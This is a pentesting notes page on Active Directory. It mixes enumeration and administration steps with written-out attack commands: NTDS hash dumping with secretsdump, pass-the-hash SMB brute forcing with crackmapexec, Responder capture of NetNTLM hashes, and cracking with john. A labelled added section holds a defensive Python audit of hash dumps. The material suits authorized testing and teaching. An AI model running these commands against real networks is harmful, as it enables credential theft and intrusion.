Active Directory Pentesting
Last modified: 2023-07-19
Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks.
Enumeration
Seatbelt is an enumeration tool.
From Outside
# Domain Controllers (DNS) discovery
dig @<target-ip> <domain-name> any
ffuf -u https://FUZZ.example.com -w subdomains.txt -mc 200,301,302,403
gobuster dns -d example.local -w subdomains.txt -t 25
# Dump password hashes from ntds.dit and system.hive
impacket-secretsdump -ntds ntds.dit -system system.hive LOCAL -outputfile hashes
# To keep only the LM:NT hash pair (the NTLM hash) from each dumped line, cut fields 3 and 4.
cut -d: -f3,4 hashes.ntds > hashes.txt
# We can use the file for brute forcing SMB credentials. For example,
crackmapexec smb <target-ip> -u <username> -H hashes.txt
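Added example, not from the original page: a small Python audit of a secretsdump export in the hashes.ntds format above, doing what a defender does with such a dump after an authorized assessment: flag empty passwords, accounts that still store an LM hash, and NT hashes shared between accounts (password reuse). The dump lines are constructed; every hash value except the two well-known constants is a placeholder.

```python
import re
from collections import defaultdict

# Well-known constants: NT hash of the empty password, and the placeholder
# secretsdump writes in the LM column when no LM hash is stored.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
NO_LM = "aad3b435b51404eeaad3b435b51404ee"

# Constructed sample in the hashes.ntds format (domain\user:rid:lmhash:nthash:::).
# All hash values other than the two constants above are made-up placeholders.
SAMPLE_DUMP = """\
EXAMPLE\\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EXAMPLE\\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
EXAMPLE\\jsmith:1104:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
EXAMPLE\\mpole:1105:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
EXAMPLE\\svc_backup:1106:0011223344556677aabbccddeeff0011:00112233445566778899aabbccddeeff:::
"""

# One dump line: user, RID, 32-hex LM hash, 32-hex NT hash, trailing ":::".
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

def parse_dump(text):
    """Yield (user, rid, lmhash, nthash); lines in any other format are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()

def lm_nt_columns(text):
    """Same result as `cut -d: -f3,4 hashes.ntds`: the lm:nt pair per account."""
    return [f"{lm}:{nt}" for _, _, lm, nt in parse_dump(text)]

def audit(text):
    """Password-hygiene findings: empty passwords, LM hashes still stored,
    and NT hashes shared by several accounts (the same password reused)."""
    by_nt = defaultdict(list)
    empty, lm_stored = [], []
    for user, _rid, lm, nt in parse_dump(text):
        by_nt[nt].append(user)
        if nt == EMPTY_NT:
            empty.append(user)
        if lm != NO_LM:
            lm_stored.append(user)
    shared = {nt: users for nt, users in by_nt.items() if len(users) > 1}
    return {"empty_password": empty, "lm_hash_stored": lm_stored, "shared_nt_hash": shared}
```

Running `audit(SAMPLE_DUMP)` on the constructed dump reports mpole with an empty password, svc_backup still storing an LM hash, and Administrator sharing its NT hash with jsmith.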
From Inside
# List all users in the AD domain
net user /domain
# Specific user
net user <username> /domain
PS> Get-ADUser -Identity <username> -Server dc.example.com -Properties *
# Filters
PS> Get-ADUser -Filter 'Name -like "*michael"' -Server dc.example.com | Format-Table Name,SamAccountName -A
# List all groups of the AD domain
net group /domain
# Specific group
net group "<group>" /domain
PS> Get-ADGroup -Identity <group> -Server dc.example.com -Properties *
# List the group members
PS> Get-ADGroupMember -Identity <group> -Server dc.example.com
# List the password policy of the AD domain
net accounts /domain
# List AD objects
PS> $ChangeDate = New-Object DateTime(2022, 02, 28, 12, 00, 00)
PS> Get-ADObject -Filter 'whenChanged -gt $ChangeDate' -includeDeletedObjects -Server dc.example.com
# Retrieve information about the given domain.
PS> Get-ADDomain -Server dc.example.com
# Change the password of the AD user
PS> Set-ADAccountPassword -Identity <username> -Server dc.example.com -OldPassword (ConvertTo-SecureString -AsPlaintext "oldpass" -force) -NewPassword (ConvertTo-SecureString -AsPlaintext "newpass" -force)
# SYSVOL - A shared folder storing the Group Policy Objects (GPOs).
dir \\dc.example.com\SYSVOL\
Microsoft Management Console (mmc)
To manage the AD from MMC, follow these steps:
- Right-click on the Windows icon.
- Click "Run" and enter "mmc" then click "OK".
- In the MMC, click "File → Add or Remove Snap-ins".
- Add all three "Active Directory…" snap-ins.
- Right-click on the "Active Directory…" in the left pane and select "Change Forest".
- Enter the domain as the Root domain and click OK.
- Click on "View → Advanced Features".
Naming Convention
If we obtain a list of users' full names from Active Directory, we can derive likely usernames by applying common naming conventions.
For instance,
john smith -> jsmith, j.smith
michael pole -> mpole, m.pole
SSH Login with AD Credentials
ssh dc.example.com\\<ad_username>@sub.dc.example.com
Inject Credentials into Memory
# /netonly: All network communications will use these injected credentials for authentication.
runas.exe /netonly /user:<domain>\<username> cmd.exe
DNS Configuration
# PowerShell
$dnsip = "<DC_IP>"
$index = Get-NetAdapter -Name 'Ethernet' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
Now check if the configuration is set correctly.
nslookup dc.example.com
Basic Knowledge
User Management
Delegation
In Active Directory, an administrator can delegate to another user the right to manage users within an Organizational Unit (OU), without granting that user admin privileges.
Setup
- Open "Active Directory Users and Computers".
- Right-click on the target OU and click "Delegate Control…". A new window will open.
- In the window, enter the username of the user to whom you want to delegate the privilege to manage users.
- Select the tasks that the delegated user should be allowed to perform.
- Click OK.
Manage Users
- Log on as the delegated user.
- For instance, to reset John's password, execute the following command in PowerShell, then enter the new password at the prompt.
Set-ADAccountPassword john -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
- The first time John logs on after that, we want him to choose his own password rather than keep the one you entered. To do that, execute the following command.
Set-ADUser -ChangePasswordAtLogon $true -Identity john -Verbose
- Now when John logs on, he will be prompted to set a new password.
Intercept NetNTLM Authentication
Start Responder to listen for any LLMNR, NBT-NS, WPAD requests.
sudo responder -I <interface-like-eth0>
Leave Responder running until it captures some requests.
If you capture a NetNTLM hash, crack it on your local machine.
echo -n '<copied-NTLM-hash>' > hash.txt
john --format=netntlmv2 --wordlist=wordlist.txt hash.txt